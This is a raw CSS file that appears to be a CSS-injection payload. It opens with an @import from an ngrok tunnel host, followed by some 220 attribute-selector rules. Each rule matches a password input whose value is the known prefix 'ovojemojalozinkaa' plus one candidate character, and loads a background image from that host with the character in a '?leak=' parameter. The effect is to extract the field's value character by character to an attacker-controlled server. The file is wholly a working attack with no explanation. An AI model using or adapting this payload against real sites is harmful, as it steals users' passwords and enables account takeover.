@import url("http://bc0a37bcf1d5.ngrok.io/?l=19");
input[value="ovojemojalozinkaa!"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=!&q=0.018138356949445766");}
input[value="ovojemojalozinkaa\""] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\"&q=0.4938031246107286");}
input[value="ovojemojalozinkaa#"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=#&q=0.23610547289388562");}
input[value="ovojemojalozinkaa$"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=$&q=0.2594897196901238");}
input[value="ovojemojalozinkaa%"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=%&q=0.1526481384048437");}
input[value="ovojemojalozinkaa&"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&&q=0.7044471247638864");}
input[value="ovojemojalozinkaa'"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak='&q=0.3547092434451935");}
input[value="ovojemojalozinkaa("] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=(&q=0.38857170947051256");}
input[value="ovojemojalozinkaa)"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=)&q=0.20991136629088003");}
input[value="ovojemojalozinkaa*"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=*&q=0.3547199411086088");}
input[value="ovojemojalozinkaa+"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=+&q=0.5501638539421567");}
input[value="ovojemojalozinkaa,"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=,&q=0.9339918307444872");}
input[value="ovojemojalozinkaa-"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=-&q=0.6687712991432839");}
input[value="ovojemojalozinkaa."] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=.&q=0.6578652151472428");}
input[value="ovojemojalozinkaa/"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=/&q=0.7874004010856706");}
input[value="ovojemojalozinkaa0"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=0&q=0.8460004757339479");}
input[value="ovojemojalozinkaa1"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=1&q=0.35885992965818936");}
input[value="ovojemojalozinkaa2"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=2&q=0.4031294735308626");}
input[value="ovojemojalozinkaa3"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=3&q=0.180426850518006");}
input[value="ovojemojalozinkaa4"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=4&q=0.07687667176531399");}
input[value="ovojemojalozinkaa5"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=5&q=0.47767651814890044");}
input[value="ovojemojalozinkaa6"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=6&q=0.40743649020626105");}
input[value="ovojemojalozinkaa7"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=7&q=0.45962375707673986");}
input[value="ovojemojalozinkaa8"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=8&q=0.3325209333552397");}
input[value="ovojemojalozinkaa9"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=9&q=0.16584232959022072");}
input[value="ovojemojalozinkaa:"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=:&q=0.5152638172914539");}
input[value="ovojemojalozinkaa;"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=;&q=0.31212630416966114");}
input[value="ovojemojalozinkaa<"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=<&q=0.8177014682011126");}
input[value="ovojemojalozinkaa="] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak==&q=0.27037514387796024");}
input[value="ovojemojalozinkaa>"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=>&q=0.7946452344623129");}
input[value="ovojemojalozinkaa?"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=?&q=0.5539633075069645");}
input[value="ovojemojalozinkaa@"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=@&q=0.41778212528019165");}
input[value="ovojemojalozinkaaA"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=A&q=0.8261320642183676");}
input[value="ovojemojalozinkaaB"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=B&q=0.09980310215658283");}
input[value="ovojemojalozinkaaC"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=C&q=0.2631161215116864");}
input[value="ovojemojalozinkaaD"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=D&q=0.5600634276388536");}
input[value="ovojemojalozinkaaE"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=E&q=0.955563094024487");}
input[value="ovojemojalozinkaaF"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=F&q=0.6021494680860113");}
input[value="ovojemojalozinkaaG"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=G&q=0.3966371712659569");}
input[value="ovojemojalozinkaaH"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=H&q=0.5082716039162072");}
input[value="ovojemojalozinkaaI"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=I&q=0.27837000313223315");}
input[value="ovojemojalozinkaaJ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=J&q=0.21888249538702387");}
input[value="ovojemojalozinkaaK"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=K&q=0.5202707577412893");}
input[value="ovojemojalozinkaaL"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=L&q=0.27408242204870725");}
input[value="ovojemojalozinkaaM"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=M&q=0.6995110579722905");}
input[value="ovojemojalozinkaaN"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=N&q=0.7687936226121004");}
input[value="ovojemojalozinkaaO"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=O&q=0.110864752441312");}
input[value="ovojemojalozinkaaP"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=P&q=0.3042999260364825");}
input[value="ovojemojalozinkaaQ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Q&q=0.49441099845392755");}
input[value="ovojemojalozinkaaR"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=R&q=0.5575942529666471");}
input[value="ovojemojalozinkaaS"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=S&q=0.9578347024825609");}
input[value="ovojemojalozinkaaT"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=T&q=0.10660758498908462");}
input[value="ovojemojalozinkaaU"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=U&q=0.8376108179402615");}
input[value="ovojemojalozinkaaV"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=V&q=0.17000347945981886");}
input[value="ovojemojalozinkaaW"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=W&q=0.4203082721209599");}
input[value="ovojemojalozinkaaX"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=X&q=0.2940426801150757");}
input[value="ovojemojalozinkaaY"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Y&q=0.7198435492968844");}
input[value="ovojemojalozinkaaZ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Z&q=0.8451268130617138");}
input[value="ovojemojalozinkaa["] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=[&q=0.7265582784966864");}
input[value="ovojemojalozinkaa\\"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=\\&q=0.005784019221160008");}
input[value="ovojemojalozinkaa]"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=]&q=0.3264127930735452");}
input[value="ovojemojalozinkaa^"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=^&q=0.015967806978661514");}
input[value="ovojemojalozinkaa_"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=_&q=0.3539655592120097");}
input[value="ovojemojalozinkaa`"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=`&q=0.9578638523195326");}
input[value="ovojemojalozinkaaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=a&q=0.4022915133866496");}
input[value="ovojemojalozinkaab"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=b&q=0.9505549086555061");}
input[value="ovojemojalozinkaac"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=c&q=0.3357233175808012");}
input[value="ovojemojalozinkaad"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=d&q=0.8952913866850227");}
input[value="ovojemojalozinkaae"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=e&q=0.8838005427450821");}
input[value="ovojemojalozinkaaf"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=f&q=0.09779460732357359");}
input[value="ovojemojalozinkaag"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=g&q=0.019705869074595705");}
input[value="ovojemojalozinkaah"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=h&q=0.8178429783858396");}
input[value="ovojemojalozinkaai"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=i&q=0.5941685504929388");}
input[value="ovojemojalozinkaaj"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=j&q=0.6358817661774407");}
input[value="ovojemojalozinkaak"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=k&q=0.2869586037378986");}
input[value="ovojemojalozinkaal"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=l&q=0.2819860745683387");}
input[value="ovojemojalozinkaam"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=m&q=0.9962761395113973");}
input[value="ovojemojalozinkaan"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=n&q=0.3061839838915248");}
input[value="ovojemojalozinkaao"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=o&q=0.0044043997898501885");}
input[value="ovojemojalozinkaap"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=p&q=0.9836003497031562");}
input[value="ovojemojalozinkaaq"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=q&q=0.08848117049788917");}
input[value="ovojemojalozinkaar"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=r&q=0.27654560536520223");}
input[value="ovojemojalozinkaas"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=s&q=0.8918248247100942");}
input[value="ovojemojalozinkaat"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=t&q=0.7571661660885367");}
input[value="ovojemojalozinkaau"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=u&q=0.010641622503134274");}
input[value="ovojemojalozinkaav"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=v&q=0.28743613059491224");}
input[value="ovojemojalozinkaaw"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=w&q=0.3680829935976362");}
input[value="ovojemojalozinkaax"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=x&q=0.802246893806607");}
input[value="ovojemojalozinkaay"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=y&q=0.8427562913655722");}
input[value="ovojemojalozinkaaz"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=z&q=0.8026182359364538");}
input[value="ovojemojalozinkaa{"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak={&q=0.8136480646127866");}
input[value="ovojemojalozinkaa|"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=|&q=0.015291756676111712");}
input[value="ovojemojalozinkaa}"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=}&q=0.7208370552315655");}
input[value="ovojemojalozinkaa~"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=~&q=0.546245646346768");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8252750659868173");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.31405604983258884");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4262155199807074");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4503570236285983");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7707555584141905");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7459395600235477");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.517241293707629");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2717295295023303");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.570732333706585");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8998003817468425");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3239043957667298");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.2659969940723521");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9553524226505432");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.6743839963347427");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.01243365422409859");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.3371063463589723");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.09438132139714717");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4645227433246282");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.21133447791999904");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.8803039648964528");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9089927969183151");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.4980446666952989");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7612432058439407");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.12183649878235081");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06441033648725569");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18528935338815744");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.9916003791813315");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.05593642495743767");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06431746617512668");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.18695887430023417");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.41332305435102423");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.7461380381646197");}
input[value="ovojemojalozinkaa"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=&q=0.06624802880231706");}
input[value="ovojemojalozinkaa "] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak= &q=0.2521142859219101");}
input[value="ovojemojalozinkaa¡"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¡&q=0.4846846127864255");}
input[value="ovojemojalozinkaa¢"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¢&q=0.4067383813918479");}
input[value="ovojemojalozinkaa£"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=£&q=0.21874073729114563");}
input[value="ovojemojalozinkaa¤"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¤&q=0.9471014590494531");}
input[value="ovojemojalozinkaa¥"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¥&q=0.8735847432247688");}
input[value="ovojemojalozinkaa¦"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¦&q=0.6261350881594381");}
input[value="ovojemojalozinkaa§"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=§&q=0.4679687349380388");}
input[value="ovojemojalozinkaa¨"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¨&q=0.7839111290143401");}
input[value="ovojemojalozinkaa©"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=©&q=0.9868667580203909");}
input[value="ovojemojalozinkaaª"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ª&q=0.016800260911641995");}
input[value="ovojemojalozinkaa«"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=«&q=0.3915332152380324");}
input[value="ovojemojalozinkaa¬"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¬&q=0.12538090224313292");}
input[value="ovojemojalozinkaa­"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=­&q=0.22281056572591562");}
input[value="ovojemojalozinkaa®"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=®&q=0.7565865329636314");}
input[value="ovojemojalozinkaa¯"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¯&q=0.9968033393089291");}
input[value="ovojemojalozinkaa°"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=°&q=0.06468166659720187");}
input[value="ovojemojalozinkaa±"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=±&q=0.13065395474651798");}
input[value="ovojemojalozinkaa²"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=²&q=0.8092519938572991");}
input[value="ovojemojalozinkaa³"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=³&q=0.5953094870408977");}
input[value="ovojemojalozinkaa´"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=´&q=0.16933803134406733");}
input[value="ovojemojalozinkaaµ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=µ&q=0.37328872857075757");}
input[value="ovojemojalozinkaa¶"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¶&q=0.03719293053780581");}
input[value="ovojemojalozinkaa·"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=·&q=0.4484976263747662");}
input[value="ovojemojalozinkaa¸"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¸&q=0.11254551280466174");}
input[value="ovojemojalozinkaa¹"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¹&q=0.841931395449157");}
input[value="ovojemojalozinkaaº"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=º&q=0.43860169920049685");}
input[value="ovojemojalozinkaa»"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=»&q=0.018086400734557362");}
input[value="ovojemojalozinkaa¼"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¼&q=0.5440633354151294");}
input[value="ovojemojalozinkaa½"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=½&q=0.15180496893654238");}
input[value="ovojemojalozinkaa¾"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¾&q=0.06212311157169248");}
input[value="ovojemojalozinkaa¿"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=¿&q=0.16182550710694055");}
input[value="ovojemojalozinkaaÀ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=À&q=0.8946169232363503");}
input[value="ovojemojalozinkaaÁ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Á&q=0.6375996945308016");}
input[value="ovojemojalozinkaaÂ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Â&q=0.9833410081803513");}
input[value="ovojemojalozinkaaÃ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ã&q=0.13715233772820334");}
input[value="ovojemojalozinkaaÄ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ä&q=0.8036618438275209");}
input[value="ovojemojalozinkaaÅ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Å&q=0.27153234480312216");}
input[value="ovojemojalozinkaaÆ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Æ&q=0.4566678968185871");}
input[value="ovojemojalozinkaaÇ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ç&q=0.5172154669042122");}
input[value="ovojemojalozinkaaÈ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=È&q=0.27643177895064963");}
input[value="ovojemojalozinkaaÉ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=É&q=0.6968466146767047");}
input[value="ovojemojalozinkaaÊ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ê&q=0.9030117429599909");}
input[value="ovojemojalozinkaaË"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ë&q=0.8002316166694579");}
input[value="ovojemojalozinkaaÌ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ì&q=0.9171685115611452");}
input[value="ovojemojalozinkaaÍ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Í&q=0.5303296421626738");}
input[value="ovojemojalozinkaaÎ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Î&q=0.6696791107100597");}
input[value="ovojemojalozinkaaÏ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ï&q=0.9110559849716744");}
input[value="ovojemojalozinkaaÐ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ð&q=0.21183049459685255");}
input[value="ovojemojalozinkaaÑ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ñ&q=0.074944992088402");}
input[value="ovojemojalozinkaaÒ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ò&q=0.2783127466650255");}
input[value="ovojemojalozinkaaÓ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ó&q=0.22146380267965116");}
input[value="ovojemojalozinkaaÔ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ô&q=0.8529087364274426");}
input[value="ovojemojalozinkaaÕ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Õ&q=0.46810066063943623");}
input[value="ovojemojalozinkaaÖ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ö&q=0.38251045860523414");}
input[value="ovojemojalozinkaa×"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=×&q=0.8335183912358457");}
input[value="ovojemojalozinkaaØ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ø&q=0.11142398779571994");}
input[value="ovojemojalozinkaaÙ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ù&q=0.5695175182530436");}
input[value="ovojemojalozinkaaÚ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ú&q=0.0169017698557985");}
input[value="ovojemojalozinkaaÛ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Û&q=0.4878734279333554");}
input[value="ovojemojalozinkaaÜ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ü&q=0.15863708373353091");}
input[value="ovojemojalozinkaaÝ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Ý&q=0.31848360808404297");}
input[value="ovojemojalozinkaaÞ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=Þ&q=0.9049799129975431");}
input[value="ovojemojalozinkaaß"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ß&q=0.1115146264413982");}
input[value="ovojemojalozinkaaà"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=à&q=0.21211242395528584");}
input[value="ovojemojalozinkaaá"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=á&q=0.036270609166103585");}
input[value="ovojemojalozinkaaâ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=â&q=0.4873604962936351");}
input[value="ovojemojalozinkaaã"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ã&q=0.3837972988016016");}
input[value="ovojemojalozinkaaä"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ä&q=0.9832279850963601");}
input[value="ovojemojalozinkaaå"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=å&q=0.031518883721833424");}
input[value="ovojemojalozinkaaæ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=æ&q=0.19552563322429584");}
input[value="ovojemojalozinkaaç"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ç&q=0.7303237387820463");}
input[value="ovojemojalozinkaaè"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=è&q=0.35774872228151566");}
input[value="ovojemojalozinkaaé"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=é&q=0.7213980074066937");}
input[value="ovojemojalozinkaaê"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ê&q=0.9535704390350759");}
input[value="ovojemojalozinkaaë"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ë&q=0.46302404733843283");}
input[value="ovojemojalozinkaaì"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ì&q=0.2817291930686794");}
input[value="ovojemojalozinkaaí"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=í&q=0.5706787987820581");}
input[value="ovojemojalozinkaaî"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=î&q=0.2008428402441358");}
input[value="ovojemojalozinkaaï"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ï&q=0.9771383446962532");}
input[value="ovojemojalozinkaað"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ð&q=0.056354109909523276");}
input[value="ovojemojalozinkaañ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ñ&q=0.09528732270495133");}
input[value="ovojemojalozinkaaò"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ò&q=0.22742322832944684");}
input[value="ovojemojalozinkaaó"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ó&q=0.061519037712108204");}
input[value="ovojemojalozinkaaô"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ô&q=0.12793431909401964");}
input[value="ovojemojalozinkaaõ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=õ&q=0.4359439464619015");}
input[value="ovojemojalozinkaaö"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ö&q=0.3485597354822958");}
input[value="ovojemojalozinkaa÷"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=÷&q=0.06821575326746898");}
input[value="ovojemojalozinkaaø"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ø&q=0.21644283652109353");}
input[value="ovojemojalozinkaaù"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ù&q=0.3568512616711441");}
input[value="ovojemojalozinkaaú"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ú&q=0.6661288140920845");}
input[value="ovojemojalozinkaaû"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=û&q=0.8424805923148746");}
input[value="ovojemojalozinkaaü"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ü&q=0.6475995171656994");}
input[value="ovojemojalozinkaaý"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ý&q=0.7751216710227584");}
input[value="ovojemojalozinkaaþ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=þ&q=0.7606941354644232");}
input[value="ovojemojalozinkaaÿ"] {background: url("http://bc0a37bcf1d5.ngrok.io/?leak=ÿ&q=0.2893010727546186");}
